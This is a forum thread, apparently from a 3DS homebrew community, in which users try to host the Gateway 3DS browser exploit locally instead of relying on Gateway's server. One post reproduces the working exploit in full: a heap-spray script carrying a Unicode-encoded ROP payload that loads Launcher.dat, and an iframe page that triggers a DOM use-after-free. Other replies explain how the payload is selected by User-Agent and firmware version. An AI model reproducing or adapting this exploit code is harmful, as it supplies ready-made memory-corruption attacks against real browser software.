Hacking WIP: Getting Gateway website exploit running on local webserver

[Deleted-19228]

The magic numbers are based on the User-Agent that is sent over to the go.gateway-3ds.com website. I have copied my UA from my 3ds xl and dumped the html source from the gateway site to one of my own and it says "Failed to load web page" and after a few seconds dumps you back to the main menu with an error like what other people are getting when attempting to run the exploit which require them to clear cookies or some such. That's definitely not the cause in this case. If anyone has any ideas on what to do please share. I don't like the idea of having to rely on their web server. It's gone down too many times recently

 

[Seanshoots]

<html>
<head>
<style>
    body {
        color:white;
        background:black;
    }
   
   
</style>
<script>
    function magicfun(mem, size, v) {
        var a = new Array(size - 20);
        nv = v + unescape("%ucccc");
        for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
        var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
 
        mem.push(t);
    }
 
    function dsm(evnt) {
        var mem = [];
 
        for (var j = 20; j < 430; j++) {
            magicfun(mem, j, unescape("\u57c4\u0010\u57c4\u0010\u57c4\u0010\u57c4\u0010\uc2fc\u0010\u50b3\u0010\uca34\u0019\u85f0\u08b8\u8008\u0018\ua00c\u001d\u46eb\u0019\u0000\u08f1\u8630\u08b8\u0001\u0000\ub020\u0039\uc01c\u001c\u6010\u002c\ufe0c\u0022\u1ff0\u0023\ubff0\u002c\u4000\u0012\udff4\u0033\u57c4\u0010\uc2fc\u0010\ua000\u0001\u8af4\u0022\u0004\u08f1\u7334\u0010\uc024\u001c\u46eb\u0019\u0000\u08f1\u0020\u08f1\u1000\u08f0\u4000\u0000\u5ff8\u0029\u3ffc\u0025\u86e0\u0016\ue030\u002b\u2010\u0021\u1f40\u0027\uc05c\u0020\ue0c4\u002d\u2000\u001b\uc2fc\u0010\u850c\u08b8\ubacc\u0011\u57c4\u0010\u8af4\u0022\u8281\ud582\u0658\u0035\udd48\u0011\u8af4\u0022\u850c\u08b8\u7334\u0010\u4850\u0035\uc2fc\u0010\u8618\u08b8\ubacc\u0011\u7f6d\u0012\u014c\u0010\u37e0\u0010\u848c\u08b8\u840c\u08b8\ubacc\u0011\ubb00\u0011\u57c4\u0010\u8af4\u0022\u0000\u0000\u0658\u0035\u03a0\u0013\u65a8\u0010\u1434\u0010\uff64\u0022\u03a0\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0b5c\u0010\ufe44\u0022\u57c4\u0010\u5ae0\u002c\u57c4\u0010\u8af4\u0022\u0658\u0035\u57c4\u0010\u2c93\u0018\uc2fc\u0010\u8618\u08b8\ubacc\u0011\udd48\u0011\u6694\u0010\u6694\u0010\u8af4\u0022\u0004\u0000\u0658\u0035\u0344\u0013\u8af4\u0022\u8618\u08b8\u7334\u0010\u0d24\u0010\u8af4\u0022\ub000\uf70f\u0658\u0035\u9864\u0011\u1a8c\u0015\u59c0\u0020\uc2fc\u0010\u8610\u08b8\u8af4\u0022\u0ffc\u08f0\u6694\u0010\u5fd4\u0035\u8af4\u0022\u84a8\u08b8\ufc24\u0010\u2215\u002c\u57c4\u0010\u57c4\u0010\u65a8\u0010\u5654\u002d\u3778\u0010\ua864\u002f\u9b94\u0011\ue780\u0020\u8605\u0012\u3da8\u0010\u85f8\u08b8\u57c4\u0010\u5ae0\u002c\udf28\u0010\uc8e4\u002f\u37e0\u0010\uc494\u0023\u0358\u0013\u1000\u08f0\u0344\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0344\u0013\u0064\u006d\u0063\u003a\u002f\u004c\u0061\u0075\u006e\u0063\u0068\u0065\u0072\u002e\u0064\u0061\u0074\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0344\u0013\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"));
        }
    }
</script>
</head>
<body>
        <h1 align="center">GATEWAY 3DS LOADING...</h1>
        <iframe width=0 height=0 src="frame.html"></iframe>
</body>
</html>

frame.html source

<html>
    <head>
        <script>
            var nb = 0;
            function handleBeforeLoad() {
                if (++nb == 1) {
                    p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                } else if (nb == 2) {
                    p.removeChild(f);
                }
            }
           
            function documentLoaded() {
                f = window.frameElement;
                p = f.parentNode;
                var o = document.createElement("object");
                o.addEventListener('beforeload', handleBeforeLoad, false);
                document.body.appendChild(o);
            }
 
            window.onload = documentLoaded;
        </script>
    </head>
    <body>
        KEKEKEKEK...
    </body>
</html>

 

[arielp]

they're using index.php, actual is http://go.gateway-3ds.com/index.php

unfortunately php-source is cannot be seen from user side,.

if they're running some php-code within...you cannot replicate it.

unless you can reverse enginering (which is not possible by only looking at above html code), or you can get the index.php source from gateway team (unlike)


.. most probably they're running something, otherwise they can just use index.html or index.htm

 

[arielp]

that html code above, is already processed by php (web server) only to show html content / java, php code itself is cannot be seen, unless you find exploit in their server/hack then grab than index.php (and all related items) .

that's how php work

sample php code

<?php
sample = "hello world";
echo $sample;
?>

what you see from user browser then "view source" only

helloworld

 

[gamesquest1]

i wonder if "KEKEKEKEK..." is some trolling

 

[s-arash]

you cant exploit browser with php cause its server side

so all of the things that gateway webpage does is about javascript codes which is client side and you can view it

 

[Thomas12345]

Well I managed to get the exploit up without connecting to gateway website...

Basically i set up a proxy server on my linux box, and on my 3ds connected to said proxy, dumped the index.html and frame.html, and created a simple web server to serve the two pages

turns out the index.html I dumped with this method is different from what I got when I just changed my PC's web browser's user agent to 3ds user agent

 

[orochi115]

Many ways:
- Packet sniffering
- Custom UA string sent from curl

 

[Seanshoots]

Well I managed to get the exploit up without connecting to gateway website...

Basically i set up a proxy server on my linux box, and on my 3ds connected to said proxy, dumped the index.html and frame.html, and created a simple web server to serve the two pages

turns out the index.html I dumped with this method is different from what you get if you simply changed user agent to 3DS user agent

I used Fiddler and set it up as a proxy on my 3DS. It's weird because the page I posted worked when I dumped it, but when I use Fiddler's autoresponder (loads pages locally instead of sending requests) or host them on my own server I only get an error. Don't know what's wrong, but I don't have a gateway card to do anything right now anyways.

 

[Duo8]

What do you think the php code is for? If it's just for detecting and distributing the payload then it shouldn't matter.

 

[Vappy]

Thomas12345 said he got it working, could try replicating his method. Of course that only gives you the static html for your 3DS configuration, and not the PHP script generating them, but that one set of pages would probably work for all other consoles of the same model and version. If someone made an archive of all combinations, it'd be a fine alternative to Gateway's own site.

 

[Duo8]

Maybe the php code is just for returning the correct site among pre made ones.

 

[Arkansaw]

can someone put up the UA string and the payload section that differs? If enough people verify it is just a matter of time

 

[hias]

The payload differs according to the user agent you are using. You need the correct user agent according to your 3ds firmware version. You can find information about the user agent strings on 3dsbrew:

http://3dbrew.org/wiki/Internet_Browser

The easiest way to get the correct agent for your 3ds is to setup a site on your local webserver which display the user agent of the accessing web browser, then visit it with your 3ds. If it does not work if you use a proxy the proxy uses a wrong user agent.

Just use the user agent switcher addon for firefox and you are good to go.
Gateway uses PHP do supply the correct payload according to the user agent, no exploit is going on here server side.

You can also use sites like this

http://www.whatsmyua.com

 

[Duo8]

The payload differs according to the user agent you are using. You need the correct user agent according to your 3ds firmware version. You can find information about the user agent strings on 3dsbrew, google it.

The easiest way to get the correct agent for your 3ds is to setup a site on your local webserver which display the user agent of the accessing web browser, then visit it with your 3ds. If it does not work if you use a proxy the proxy uses a wrong user agent.

Just use the user agent switcher addon for firefox and you are good to go.
Gateway uses PHP do supply the correct payload according to the user agent, no exploit is going on here server side.

Or just follow this:
Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US

<lang> is "en", "fr", etc. <region> is "US", "EU", etc. See below for <version>

Version is in browser settings.

 

[Deleted-19228]

It's not generated using ONLY the UA. There is something else that is sent over.